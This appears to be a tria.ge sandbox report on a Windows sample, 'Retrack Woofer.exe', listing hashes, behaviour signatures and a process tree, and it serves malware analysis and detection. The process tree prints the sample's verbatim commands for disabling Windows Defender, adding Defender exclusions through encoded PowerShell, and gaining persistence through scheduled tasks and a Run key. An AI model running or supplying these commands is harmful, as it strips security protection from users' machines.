Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
89s -
max time network
99s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
07/07/2024, 12:49
Static task
static1
Behavioral task
behavioral1
Sample
Retrack Woofer.exe
Resource
win7-20240705-en
General
-
Target
Retrack Woofer.exe
-
Size
804KB
-
MD5
ae3f1e9ec89b546f4542ab3b3df5f593
-
SHA1
578044dc221016ef0a09fef215f731170fbfe6cd
-
SHA256
8af4c53b8010c14e5a07c9f72ec0172588ef13d7aa04afa1332666732d95cb0f
-
SHA512
57ff387cd6a66e5fe312b0ce383f5423625d20e0f9d1ecdf78e52c729ff9d73feaaec4751450f152be313793fe8dc3d4c656be802e0f8f876d36e65564eeb2b3
-
SSDEEP
24576:06mTXNe2tyyucITeGvlC6g9joXzFqeECi:lmhrClF9DzzF8
Malware Config
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/files/0x00070000000234c6-33.dat disable_win_def -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection WScript.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" WScript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" WScript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" WScript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000\Control Panel\International\Geo\Nation Retrack Woofer.exe Key value queried \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 3 IoCs
pid Process 3632 Plugin (2).exe 5072 UpdateService.exe 112 Retrack spoof.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DDP Host = "C:\\Program Files (x86)\\DDP Host\\ddphost.exe" UpdateService.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UpdateService.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\DDP Host\ddphost.exe UpdateService.exe File created C:\Program Files (x86)\DDP Host\ddphost.exe UpdateService.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Plugin (2).exe Retrack Woofer.exe File created C:\Windows\Plugin.vbs Retrack Woofer.exe File created C:\Windows\UpdateService.exe Retrack Woofer.exe File created C:\Windows\Retrack spoof.exe Retrack Woofer.exe -
pid Process 1060 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2060 112 WerFault.exe 91 -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133648302634227806" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000_Classes\Local Settings Retrack Woofer.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4232 schtasks.exe 1704 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 61 IoCs
pid Process 1060 powershell.exe 1060 powershell.exe 4208 powershell.exe 4208 powershell.exe 460 powershell.exe 1964 powershell.exe 1964 powershell.exe 460 powershell.exe 1540 powershell.exe 1540 powershell.exe 2804 powershell.exe 2804 powershell.exe 4984 powershell.exe 4984 powershell.exe 3524 powershell.exe 3524 powershell.exe 2416 powershell.exe 2416 powershell.exe 216 powershell.exe 216 powershell.exe 4412 powershell.exe 4412 powershell.exe 1712 powershell.exe 1712 powershell.exe 4208 powershell.exe 4208 powershell.exe 460 powershell.exe 460 powershell.exe 1964 powershell.exe 1964 powershell.exe 1540 powershell.exe 2804 powershell.exe 4984 powershell.exe 2416 powershell.exe 3524 powershell.exe 1712 powershell.exe 4412 powershell.exe 216 powershell.exe 5072 UpdateService.exe 5072 UpdateService.exe 5072 UpdateService.exe 5072 UpdateService.exe 5072 UpdateService.exe 5072 UpdateService.exe 5072 UpdateService.exe 5072 UpdateService.exe 5072 UpdateService.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 5072 UpdateService.exe 5072 UpdateService.exe 5072 UpdateService.exe 5072 UpdateService.exe 5072 UpdateService.exe 5072 UpdateService.exe 5072 UpdateService.exe 5072 UpdateService.exe 5072 UpdateService.exe 5072 UpdateService.exe 5072 UpdateService.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 5072 UpdateService.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1060 powershell.exe Token: SeDebugPrivilege 4208 powershell.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeDebugPrivilege 460 powershell.exe Token: SeDebugPrivilege 1540 powershell.exe Token: SeDebugPrivilege 2804 powershell.exe Token: SeDebugPrivilege 4984 powershell.exe Token: SeDebugPrivilege 3524 powershell.exe Token: SeDebugPrivilege 4412 powershell.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 2416 powershell.exe Token: SeDebugPrivilege 216 powershell.exe Token: SeDebugPrivilege 5072 UpdateService.exe Token: SeDebugPrivilege 5072 UpdateService.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe Token: SeShutdownPrivilege 2244 chrome.exe Token: SeCreatePagefilePrivilege 2244 chrome.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe 2244 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3760 wrote to memory of 1060 3760 Retrack Woofer.exe 84 PID 3760 wrote to memory of 1060 3760 Retrack Woofer.exe 84 PID 3760 wrote to memory of 3632 3760 Retrack Woofer.exe 86 PID 3760 wrote to memory of 3632 3760 Retrack Woofer.exe 86 PID 3760 wrote to memory of 3632 3760 Retrack Woofer.exe 86 PID 3760 wrote to memory of 5008 3760 Retrack Woofer.exe 135 PID 3760 wrote to memory of 5008 3760 Retrack Woofer.exe 135 PID 3760 wrote to memory of 5072 3760 Retrack Woofer.exe 89 PID 3760 wrote to memory of 5072 3760 Retrack Woofer.exe 89 PID 3760 wrote to memory of 5072 3760 Retrack Woofer.exe 89 PID 3760 wrote to memory of 112 3760 Retrack Woofer.exe 91 PID 3760 wrote to memory of 112 3760 Retrack Woofer.exe 91 PID 3760 wrote to memory of 112 3760 Retrack Woofer.exe 91 PID 5008 wrote to memory of 844 5008 WScript.exe 92 PID 5008 wrote to memory of 844 5008 WScript.exe 92 PID 844 wrote to memory of 4208 844 WScript.exe 93 PID 844 wrote to memory of 4208 844 WScript.exe 93 PID 3632 wrote to memory of 652 3632 Plugin (2).exe 94 PID 3632 wrote to memory of 652 3632 Plugin (2).exe 94 PID 844 wrote to memory of 1964 844 WScript.exe 96 PID 844 wrote to memory of 1964 844 WScript.exe 96 PID 844 wrote to memory of 460 844 WScript.exe 98 PID 844 wrote to memory of 460 844 WScript.exe 98 PID 844 wrote to memory of 2804 844 WScript.exe 100 PID 844 wrote to memory of 2804 844 WScript.exe 100 PID 844 wrote to memory of 1540 844 WScript.exe 102 PID 844 wrote to memory of 1540 844 WScript.exe 102 PID 844 wrote to memory of 4984 844 WScript.exe 104 PID 844 wrote to memory of 4984 844 WScript.exe 104 PID 844 wrote to memory of 3524 844 WScript.exe 106 PID 844 wrote to memory of 3524 844 WScript.exe 106 PID 652 wrote to memory of 4888 652 cmd.exe 107 PID 652 wrote to memory of 4888 652 cmd.exe 107 PID 844 wrote to memory of 4412 844 WScript.exe 109 PID 844 wrote to memory of 4412 844 WScript.exe 109 PID 844 wrote to memory of 1712 844 WScript.exe 111 PID 844 wrote to memory of 1712 844 WScript.exe 111 PID 844 wrote to memory of 2416 844 WScript.exe 113 PID 844 wrote to memory of 2416 844 WScript.exe 113 PID 844 wrote to memory of 216 844 WScript.exe 115 PID 844 wrote to memory of 216 844 WScript.exe 115 PID 652 wrote to memory of 2592 652 cmd.exe 126 PID 652 wrote to memory of 2592 652 cmd.exe 126 PID 652 wrote to memory of 3096 652 cmd.exe 118 PID 652 wrote to memory of 3096 652 cmd.exe 118 PID 652 wrote to memory of 2052 652 cmd.exe 119 PID 652 wrote to memory of 2052 652 cmd.exe 119 PID 5072 wrote to memory of 4232 5072 UpdateService.exe 120 PID 5072 wrote to memory of 4232 5072 UpdateService.exe 120 PID 5072 wrote to memory of 4232 5072 UpdateService.exe 120 PID 652 wrote to memory of 2716 652 cmd.exe 122 PID 652 wrote to memory of 2716 652 cmd.exe 122 PID 652 wrote to memory of 4964 652 cmd.exe 124 PID 652 wrote to memory of 4964 652 cmd.exe 124 PID 652 wrote to memory of 2060 652 cmd.exe 139 PID 652 wrote to memory of 2060 652 cmd.exe 139 PID 652 wrote to memory of 5048 652 cmd.exe 127 PID 652 wrote to memory of 5048 652 cmd.exe 127 PID 652 wrote to memory of 988 652 cmd.exe 128 PID 652 wrote to memory of 988 652 cmd.exe 128 PID 5072 wrote to memory of 1704 5072 UpdateService.exe 129 PID 5072 wrote to memory of 1704 5072 UpdateService.exe 129 PID 5072 wrote to memory of 1704 5072 UpdateService.exe 129 PID 652 wrote to memory of 3544 652 cmd.exe 131 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Retrack Woofer.exe"C:\Users\Admin\AppData\Local\Temp\Retrack Woofer.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAeAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYQB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAcABkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAcwBmACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1060
-
-
C:\Windows\Plugin (2).exe"C:\Windows\Plugin (2).exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EA50.tmp\EA61.tmp\EA62.bat "C:\Windows\Plugin (2).exe""3⤵
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4888
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵PID:2592
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵PID:3096
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵PID:2052
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2716
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4964
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2060
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5048
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:988
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵PID:3544
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵PID:1952
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵PID:3964
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵PID:3268
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:5008
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:1612
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵PID:2196
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵PID:2268
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵PID:2464
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵PID:2272
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵PID:3740
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵PID:3032
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵PID:964
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵PID:2292
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵PID:4676
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵PID:4600
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:1216
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:2200
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:4612
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:2660
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
PID:5104
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\Plugin.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\Plugin.vbs" /elevate3⤵
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:216
-
-
-
-
C:\Windows\UpdateService.exe"C:\Windows\UpdateService.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "DDP Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmp15D5.tmp"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4232
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "DDP Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp1CAC.tmp"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1704
-
-
-
C:\Windows\Retrack spoof.exe"C:\Windows\Retrack spoof.exe"2⤵
- Executes dropped EXE
PID:112 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 112 -s 10483⤵
- Program crash
PID:2060
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 112 -ip 1121⤵PID:2592
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2244 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb1affab58,0x7ffb1affab68,0x7ffb1affab782⤵PID:2076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1772 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:22⤵PID:4912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:82⤵PID:1596
-
-
